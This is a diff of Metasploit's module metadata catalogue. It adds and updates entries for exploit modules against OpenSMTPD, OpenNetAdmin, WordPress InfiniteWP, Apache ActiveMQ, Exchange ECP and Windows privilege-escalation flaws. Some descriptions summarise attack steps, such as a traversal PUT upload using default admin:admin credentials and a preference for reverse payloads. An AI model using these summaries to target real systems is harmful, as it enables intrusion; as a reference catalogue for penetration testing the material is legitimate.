+    "path": "/modules/exploits/unix/smtp/opensmtpd_mail_from_rce.rb",
+    "is_install_path": true,
+    "ref_name": "unix/smtp/opensmtpd_mail_from_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_unix/smtp/qmail_bash_env_exec": {
    "name": "Qmail SMTP Bash Environment Variable Injection (Shellshock)",
    "fullname": "exploit/unix/smtp/qmail_bash_env_exec",
@@ -86468,7 +86835,7 @@
      "Drupal 8.x (Unix In-Memory)",
      "Drupal 8.x (Linux Dropper)"
    ],
-    "mod_time": "2019-03-05 18:58:11 +0000",
+    "mod_time": "2020-02-19 01:06:50 +0000",
    "path": "/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/drupal_drupalgeddon2",
@@ -86578,7 +86945,7 @@
      "PHP In-Memory",
      "Unix In-Memory"
    ],
-    "mod_time": "2019-04-24 11:41:30 +0000",
+    "mod_time": "2020-02-19 01:06:50 +0000",
    "path": "/modules/exploits/unix/webapp/drupal_restws_unserialize.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/drupal_restws_unserialize",
@@ -87748,7 +88115,7 @@
      "URL-http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/",
      "URL-https://github.com/joomla/joomla-cms/commit/fa5645208eefd70f521cd2e4d53d5378622133d8",
      "URL-http://niiconsulting.com/checkmate/2013/08/critical-joomla-file-upload-vulnerability/",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/08/15/time-to-patch-joomla"
+      "URL-https://blog.rapid7.com/2013/08/15/time-to-patch-joomla"
    ],
    "platform": "PHP",
    "arch": "php",
@@ -87771,7 +88138,7 @@
    "targets": [
      "Joomla 2.5.x <=2.5.13 / Joomla 3.x <=3.1.4"
    ],
-    "mod_time": "2018-08-20 15:43:07 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/unix/webapp/joomla_media_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/joomla_media_upload_exec",
@@ -88612,6 +88979,55 @@
    },
    "needs_cleanup": true
  },
+  "exploit_unix/webapp/opennetadmin_ping_cmd_injection": {
+    "name": "OpenNetAdmin Ping Command Injection",
+    "fullname": "exploit/unix/webapp/opennetadmin_ping_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-11-19",
+    "type": "exploit",
+    "author": [
+      "mattpascoe",
+      "Onur ER <onur@onurer.net>"
+    ],
+    "description": "This module exploits a command injection in OpenNetAdmin between 8.5.14 and 18.1.1.",
+    "references": [
+      "EDB-47691"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2020-02-21 15:47:32 +0000",
+    "path": "/modules/exploits/unix/webapp/opennetadmin_ping_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/opennetadmin_ping_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_unix/webapp/opensis_modname_exec": {
    "name": "OpenSIS 'modname' PHP Code Execution",
    "fullname": "exploit/unix/webapp/opensis_modname_exec",
@@ -91580,6 +91996,68 @@
    },
    "needs_cleanup": true
  },
+  "exploit_unix/webapp/wp_infinitewp_auth_bypass": {
+    "name": "WordPress InfiniteWP Client Authentication Bypass",
+    "fullname": "exploit/unix/webapp/wp_infinitewp_auth_bypass",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2020-01-14",
+    "type": "exploit",
+    "author": [
+      "WebARX",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits an authentication bypass in the WordPress\n        InfiniteWP Client plugin to log in as an administrator and execute\n        arbitrary PHP code by overwriting the file specified by PLUGIN_FILE.\n\n        The module will attempt to retrieve the original PLUGIN_FILE contents\n        and restore them after payload execution. If VerifyContents is set,\n        which is the default setting, the module will check to see if the\n        restored contents match the original.\n\n        Note that a valid administrator username is required for this module.\n\n        WordPress >= 4.9 is currently not supported due to a breaking WordPress\n        API change. Tested against 4.8.3.",
+    "references": [
+      "WPVDB-10011",
+      "URL-https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/",
+      "URL-https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/",
+      "URL-https://blog.sucuri.net/2020/01/authentication-bypass-vulnerability-in-infinitewp-client.html"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "InfiniteWP Client < 1.9.4.5"
+    ],
+    "mod_time": "2020-03-03 13:22:01 +0000",
+    "path": "/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/wp_infinitewp_auth_bypass",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "config-changes"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_unix/webapp/wp_infusionsoft_upload": {
    "name": "Wordpress InfusionSoft Upload Vulnerability",
    "fullname": "exploit/unix/webapp/wp_infusionsoft_upload",
@@ -92031,7 +92509,7 @@
    "targets": [
      "WordPress"
    ],
-    "mod_time": "2019-11-28 20:13:21 +0000",
+    "mod_time": "2020-02-26 10:39:50 +0000",
    "path": "/modules/exploits/unix/webapp/wp_plainview_activity_monitor_rce.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_plainview_activity_monitor_rce",
@@ -94755,7 +95233,7 @@
      "URL-http://labs.alienvault.com/labs/index.php/2012/cve-2012-1535-adobe-flash-being-exploited-in-the-wild/",
      "URL-https://developer.apple.com/fonts/TTRefMan/RM06/Chap6.html",
      "URL-http://contagiodump.blogspot.com.es/2012/08/cve-2012-1535-samples-and-info.html",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/08/17/adobe-flash-player-exploit-cve-2012-1535-now-available-for-metasploit",
+      "URL-https://blog.rapid7.com/2012/08/17/adobe-flash-player-exploit-cve-2012-1535-now-available-for-metasploit",
      "URL-http://www.adobe.com/support/security/bulletins/apsb12-18.html"
    ],
    "platform": "Windows",
@@ -94776,7 +95254,7 @@
      "IE 8 on Windows 7 SP1",
      "IE 9 on Windows 7 SP1"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/browser/adobe_flash_otf_font.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/adobe_flash_otf_font",
@@ -94897,7 +95375,7 @@
      "BID-53395",
      "URL-http://www.adobe.com/support/security/bulletins/apsb12-09.html",
      "URL-http://contagiodump.blogspot.com.es/2012/05/may-3-cve-2012-0779-world-uyghur.html",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/06/22/the-secret-sauce-to-cve-2012-0779-adobe-flash-object-confusion-vulnerability"
+      "URL-https://blog.rapid7.com/2012/06/22/the-secret-sauce-to-cve-2012-0779-adobe-flash-object-confusion-vulnerability"
    ],
    "platform": "Windows",
    "arch": "",
@@ -94914,7 +95392,7 @@
      "IE 7 on Windows XP SP3",
      "IE 8 on Windows XP SP3 with msvcrt ROP"
    ],
-    "mod_time": "2017-10-05 16:44:36 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/browser/adobe_flash_rtmp.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/adobe_flash_rtmp",
@@ -96963,7 +97441,7 @@
      "OSVDB-81443",
      "ZDI-12-113",
      "URL-http://www-304.ibm.com/support/docview.wss?uid=swg21591705",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/07/11/it-isnt-always-about-buffer-overflow"
+      "URL-https://blog.rapid7.com/2012/07/11/it-isnt-always-about-buffer-overflow"
    ],
    "platform": "Windows",
    "arch": "",
@@ -96978,7 +97456,7 @@
      "Automatic",
      "IE 6 / IE7 (No DEP)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/browser/clear_quest_cqole.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/clear_quest_cqole",
@@ -97687,7 +98165,7 @@
      "CVE-2013-0108",
      "OSVDB-90583",
      "BID-58134",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/03/11/cve-2013-0108-honeywell-ebi",
+      "URL-https://blog.rapid7.com/2013/03/11/cve-2013-0108-honeywell-ebi",
      "URL-http://ics-cert.us-cert.gov/pdf/ICSA-13-053-02.pdf"
    ],
    "platform": "Windows",
@@ -97702,7 +98180,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-08-02 09:48:53 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/honeywell_hscremotedeploy_exec",
@@ -98359,7 +98837,7 @@
      "URL-http://technet.microsoft.com/en-us/security/advisory/2794220",
      "URL-http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx",
      "URL-http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012"
+      "URL-https://blog.rapid7.com/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012"
    ],
    "platform": "Windows",
    "arch": "",
@@ -98377,7 +98855,7 @@
      "IE 8 on Windows Server 2003",
      "IE 8 on Windows 7"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 09:26:29 +0000",
    "path": "/modules/exploits/windows/browser/ie_cbutton_uaf.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/ie_cbutton_uaf",
@@ -98611,7 +99089,7 @@
      "MSB-MS13-080",
      "URL-http://technet.microsoft.com/en-us/security/advisory/2887505",
      "URL-http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/09/30/metasploit-releases-cve-2013-3893-ie-setmousecapture-use-after-free"
+      "URL-https://blog.rapid7.com/2013/09/30/metasploit-releases-cve-2013-3893-ie-setmousecapture-use-after-free"
    ],
    "platform": "Windows",
    "arch": "",
@@ -98627,7 +99105,7 @@
      "Windows 7 with Office 2007|2010",
      "Windows XP with IE 8"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/ie_setmousecapture_uaf",
@@ -101629,7 +102107,7 @@
      "OSVDB-82865",
      "URL-http://labs.alienvault.com/labs/index.php/2012/ongoing-attacks-exploiting-cve-2012-1875/",
      "URL-https://twitter.com/binjo/status/212795802974830592",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities"
+      "URL-https://blog.rapid7.com/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities"
    ],
    "platform": "Windows",
    "arch": "",
@@ -101646,7 +102124,7 @@
      "IE 8 on Windows XP SP3 with JRE ROP",
      "IE 8 on Windows 7 SP1/Vista SP2 with JRE ROP"
    ],
-    "mod_time": "2017-10-05 16:44:36 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/browser/ms12_037_same_id.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/ms12_037_same_id",
@@ -102308,7 +102786,7 @@
      "MSB-MS12-043",
      "URL-http://technet.microsoft.com/en-us/security/advisory/2719615",
      "URL-http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities"
+      "URL-https://blog.rapid7.com/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities"
    ],
    "platform": "Windows",
    "arch": "",
@@ -102328,7 +102806,7 @@
      "IE 8 with Java 6 on Windows 7 SP1/Vista SP2",
      "IE 9 with Java 6 on Windows 7 SP1"
    ],
-    "mod_time": "2017-10-05 16:44:36 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/msxml_get_definition_code_exec",
@@ -102974,7 +103452,7 @@
      "OSVDB-81439",
      "URL-http://dvlabs.tippingpoint.com/advisory/TPTI-12-05",
      "URL-http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/08/15/the-stack-cookies-bypass-on-cve-2012-0549"
+      "URL-https://blog.rapid7.com/2012/08/15/the-stack-cookies-bypass-on-cve-2012-0549"
    ],
    "platform": "Windows",
    "arch": "",
@@ -102992,7 +103470,7 @@
      "IE 8 with Java 6 on Windows XP SP3/7 SP1/Vista SP2",
      "IE 9 with Java 6 on Windows 7 SP1"
    ],
-    "mod_time": "2017-10-05 16:44:36 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/oracle_autovue_setmarkupmode",
@@ -104232,7 +104710,7 @@
      "Windows XP SP0-SP3 + JAVA + DEP bypass (IE8)",
      "Windows 7 + JAVA + DEP bypass (IE8)"
    ],
-    "mod_time": "2017-10-05 16:44:36 +0000",
+    "mod_time": "2020-02-26 14:53:20 +0000",
    "path": "/modules/exploits/windows/browser/teechart_pro.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/teechart_pro",
@@ -107379,7 +107857,7 @@
      "metacom",
      "wvu <wvu@metasploit.com>"
    ],
-    "description": "This module exploits a stack-based buffer overflow on Beetel Connection Manager. The\n        vulnerability exists in the parsing of the UserName parameter in the NetConfig.ini\n        file. The module has been tested successfully on PCW_BTLINDV1.0.0B04 over Windows XP\n        SP3 and Windows 7 SP1.",
+    "description": "This module exploits a stack-based buffer overflow in Beetel Connection\n        Manager. The vulnerability exists in the parsing of the UserName\n        parameter in the NetConfig.ini file.\n\n        The module has been tested successfully against version\n        PCW_BTLINDV1.0.0B04 on Windows XP SP3 and Windows 7 SP1.",
    "references": [
      "OSVDB-98714",
      "EDB-28969"
@@ -107396,7 +107874,7 @@
    "targets": [
      "PCW_BTLINDV1.0.0B04 (WinXP SP3, Win7 SP1)"
    ],
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2020-02-04 10:05:41 +0000",
    "path": "/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/beetel_netconfig_ini_bof",
@@ -110871,7 +111349,7 @@
      "MSB-MS13-071",
      "BID-62176",
      "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=1040",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/09/25/change-the-theme-get-a-shell"
+      "URL-https://blog.rapid7.com/2013/09/25/change-the-theme-get-a-shell"
    ],
    "platform": "Windows",
    "arch": "",
@@ -110885,7 +111363,7 @@
    "targets": [
      "Windows XP SP3 / Windows 2003 SP2"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/fileformat/ms13_071_theme.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ms13_071_theme",
@@ -113071,7 +113549,7 @@
    "targets": [
      "VLC 1.1.8 on Windows XP SP3"
    ],
-    "mod_time": "2018-09-15 18:54:45 +0000",
+    "mod_time": "2020-02-26 14:53:20 +0000",
    "path": "/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/vlc_modplug_s3m",
@@ -117083,6 +117561,57 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/http/apache_activemq_traversal_upload": {
+    "name": "Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload",
+    "fullname": "exploit/windows/http/apache_activemq_traversal_upload",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2015-08-19",
+    "type": "exploit",
+    "author": [
+      "David Jorm",
+      "Erik Wynter"
+    ],
+    "description": "This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache\n        ActiveMQ 5.x before 5.11.2 for Windows.\n\n        The module tries to upload a JSP payload to the /admin directory via the traversal\n        path /fileserver/..\\admin\\ using an HTTP PUT request with the default ActiveMQ\n        credentials admin:admin (or other credentials provided by the user). It then issues\n        an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the\n        payload and obtain a shell.",
+    "references": [
+      "CVE-2015-1830",
+      "EDB-40857",
+      "URL-https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": 8161,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows Java"
+    ],
+    "mod_time": "2020-03-05 15:03:05 +0000",
+    "path": "/modules/exploits/windows/http/apache_activemq_traversal_upload.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/apache_activemq_traversal_upload",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/http/apache_chunked": {
    "name": "Apache Win32 Chunked Encoding",
    "fullname": "exploit/windows/http/apache_chunked",
@@ -118979,6 +119508,67 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/http/exchange_ecp_viewstate": {
+    "name": "Exchange Control Panel Viewstate Deserialization",
+    "fullname": "exploit/windows/http/exchange_ecp_viewstate",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-02-11",
+    "type": "exploit",
+    "author": [
+      "Spencer McIntyre"
+    ],
+    "description": "This module exploits a .NET serialization vulnerability in the\n          Exchange Control Panel (ECP) web page. The vulnerability is due to\n          Microsoft Exchange Server not randomizing the keys on a\n          per-installation basis resulting in them using the same validationKey\n          and decryptionKey values. With knowledge of these, values an attacker\n          can craft a special viewstate to cause an OS command to be executed\n          by NT_AUTHORITY\\SYSTEM using .NET deserialization.",
+    "references": [
+      "CVE-2020-0688",
+      "URL-https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows (x86)",
+      "Windows (x64)",
+      "Windows (cmd)"
+    ],
+    "mod_time": "2020-03-07 10:43:51 +0000",
+    "path": "/modules/exploits/windows/http/exchange_ecp_viewstate.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/exchange_ecp_viewstate",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/http/ezserver_http": {
    "name": "EZHomeTech EzServer Stack Buffer Overflow Vulnerability",
    "fullname": "exploit/windows/http/ezserver_http",
@@ -119109,7 +119699,7 @@
    "targets": [
      "Windows Vista / Windows 7 (x86)"
    ],
-    "mod_time": "2019-10-08 11:44:41 +0000",
+    "mod_time": "2020-03-05 14:48:37 +0000",
    "path": "/modules/exploits/windows/http/file_sharing_wizard_seh.rb",
    "is_install_path": true,
    "ref_name": "windows/http/file_sharing_wizard_seh",
@@ -120839,7 +121429,7 @@
    ],
    "description": "This module exploits a command injection vulnerability\n        discovered in HP SiteScope 11.30 and earlier versions (tested in 11.26\n        and 11.30). The vulnerability exists in the DNS Tool allowing an\n        attacker to execute arbitrary commands in the context of the service. By\n        default, HP SiteScope installs and runs as SYSTEM in Windows and does\n        not require authentication. This vulnerability only exists on the\n        Windows version. The Linux version is unaffected.",
    "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2015/10/09/r7-2015-17-hp-sitescope-dns-tool-command-injection",
+      "URL-https://blog.rapid7.com/2015/10/09/r7-2015-17-hp-sitescope-dns-tool-command-injection",
      "URL-http://www8.hp.com/us/en/software-solutions/sitescope-application-monitoring/index.html"
    ],
    "platform": "Windows",
@@ -120864,7 +121454,7 @@
      "HP SiteScope 11.30 / Microsoft Windows 7 and higher",
      "HP SiteScope 11.30 / CMD"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/http/hp_sitescope_dns_tool.rb",
    "is_install_path": true,
    "ref_name": "windows/http/hp_sitescope_dns_tool",
@@ -122055,7 +122645,7 @@
    ],
    "description": "This module exploits a vulnerability found in ManageEngine Desktop Central 9. When\n        uploading a 7z file, the FileUploadServlet class does not check the user-controlled\n        ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to\n        inject a null bye at the end of the value to create a malicious file with an arbitrary\n        file type, and then place it under a directory that allows server-side scripts to run,\n        which results in remote code execution under the context of SYSTEM.\n\n        Please note that by default, some ManageEngine Desktop Central versions run on port 8020,\n        but older ones run on port 8040. Also, using this exploit will leave debugging information\n        produced by FileUploadServlet in file rdslog0.txt.\n\n        This exploit was successfully tested on version 9, build 90109 and build 91084.",
    "references": [
-      "URL-https://community.rapid7.com/community/infosec/blog/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249",
+      "URL-https://blog.rapid7.com/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249",
      "CVE-2015-8249"
    ],
    "platform": "Windows",
@@ -122079,7 +122669,7 @@
    "targets": [
      "ManageEngine Desktop Central 9 on Windows"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/http/manageengine_connectionid_write.rb",
    "is_install_path": true,
    "ref_name": "windows/http/manageengine_connectionid_write",
@@ -122573,7 +123163,7 @@
    "targets": [
      "Universal Windows Target"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-26 14:53:20 +0000",
    "path": "/modules/exploits/windows/http/novell_imanager_upload.rb",
    "is_install_path": true,
    "ref_name": "windows/http/novell_imanager_upload",
@@ -129002,7 +129592,7 @@
      "phra",
      "lupman"
    ],
-    "description": "This module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n        to achieve a SYSTEM handle for elevation of privilege.\n        It requires a CLSID string.",
+    "description": "This module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n        to achieve a SYSTEM handle for elevation of privilege.\n        It requires a CLSID string.\n        Windows 10 after version 1803, (April 2018 update, build 17134) and all\n        versions of Windows Server 2019 are not vulnerable.",
    "references": [
      "MSB-MS16-075",
      "CVE-2016-3225",
@@ -129024,7 +129614,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-01-12 04:32:21 +0000",
+    "mod_time": "2020-02-21 08:33:20 +0000",
    "path": "/modules/exploits/windows/local/ms16_075_reflection_juicy.rb",
    "is_install_path": true,
    "ref_name": "windows/local/ms16_075_reflection_juicy",
@@ -129894,6 +130484,57 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/local/ricoh_driver_privesc": {
+    "name": "Ricoh Driver Privilege Escalation",
+    "fullname": "exploit/windows/local/ricoh_driver_privesc",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-01-22",
+    "type": "exploit",
+    "author": [
+      "Alexander Pudwill",
+      "Pentagrid AG",
+      "Shelby Pace"
+    ],
+    "description": "Various Ricoh printer drivers allow escalation of\n        privileges on Windows systems.\n\n        For vulnerable drivers, a low-privileged user can\n        read/write files within the `RICOH_DRV` directory\n        and its subdirectories.\n\n        `PrintIsolationHost.exe`, a Windows process running\n        as NT AUTHORITY\\SYSTEM, loads driver-specific DLLs\n        during the installation of a printer. A user can\n        elevate to SYSTEM by writing a malicious DLL to\n        the vulnerable driver directory and adding a new\n        printer with a vulnerable driver.\n\n        This module leverages the `prnmngr.vbs` script\n        to add and delete printers. Multiple runs of this\n        module may be required given successful exploitation\n        is time-sensitive.",
+    "references": [
+      "CVE-2019-19363",
+      "URL-https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/"
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows"
+    ],
+    "mod_time": "2020-02-06 14:11:42 +0000",
+    "path": "/modules/exploits/windows/local/ricoh_driver_privesc.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/ricoh_driver_privesc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "SideEffects": [
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "Stability": [
+        "service-resource-loss"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_windows/local/run_as": {
    "name": "Windows Run Command As User",
    "fullname": "exploit/windows/local/run_as",
@@ -130221,6 +130862,54 @@
    },
    "needs_cleanup": true
  },
+  "exploit_windows/local/windscribe_windscribeservice_priv_esc": {
+    "name": "Windscribe WindscribeService Named Pipe Privilege Escalation",
+    "fullname": "exploit/windows/local/windscribe_windscribeservice_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2018-05-24",
+    "type": "exploit",
+    "author": [
+      "Emin Ghuliev",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "The Windscribe VPN client application for Windows makes use of a\n        Windows service `WindscribeService.exe` which exposes a named pipe\n        `\\.\\pipe\\WindscribeService` allowing execution of programs with\n        elevated privileges.\n\n        Windscribe versions prior to 1.82 do not validate user-supplied\n        program names, allowing execution of arbitrary commands as SYSTEM.\n\n        This module has been tested successfully on Windscribe versions\n        1.80 and 1.81 on Windows 7 SP1 (x64).",
+    "references": [
+      "CVE-2018-11479",
+      "URL-http://blog.emingh.com/2018/05/windscribe-vpn-privilege-escalation.html",
+      "URL-https://pastebin.com/eLG3dpYK"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-02-01 00:41:07 +0000",
+    "path": "/modules/exploits/windows/local/windscribe_windscribeservice_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/windscribe_windscribeservice_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_windows/local/wmi": {
    "name": "Windows Management Instrumentation (WMI) Remote Command Execution",
    "fullname": "exploit/windows/local/wmi",
@@ -130861,7 +131550,7 @@
    "author": [
      "Manuel Feifel"
    ],
-    "description": "This module will execute an arbitrary payload on an \"ESEL\" server used by the\n        AIS logistic software. The server typically listens on port 5099 without TLS.\n        There could also be server listening on 5100 with TLS but the port 5099 is\n        usually always open.\n        The login process is vulnerable to an SQL Injection. Usually a MSSQL Server\n        with the 'sa' user is in place.\n\n        This module was verified on version 67 but it should also run on lower versions.\n        An fixed version was created by AIS in September 2017. However most systems\n        have not been updated.\n\n        In regard to the payload, unless there is a closed port in the web server,\n        you dont want to use any \"bind\" payload. You want a \"reverse\" payload,\n        probably to your port 80 or to any other outbound port allowed on the firewall.\n\n        Currently, one delivery method is supported\n\n        This method takes advantage of the Command Stager subsystem. This allows using\n        various techniques, such as using a TFTP server, to send the executable. By default\n        the Command Stager uses 'wcsript.exe' to generate the executable on the target.\n\n        NOTE: This module will leave a payload executable on the target system when the\n        attack is finished.",
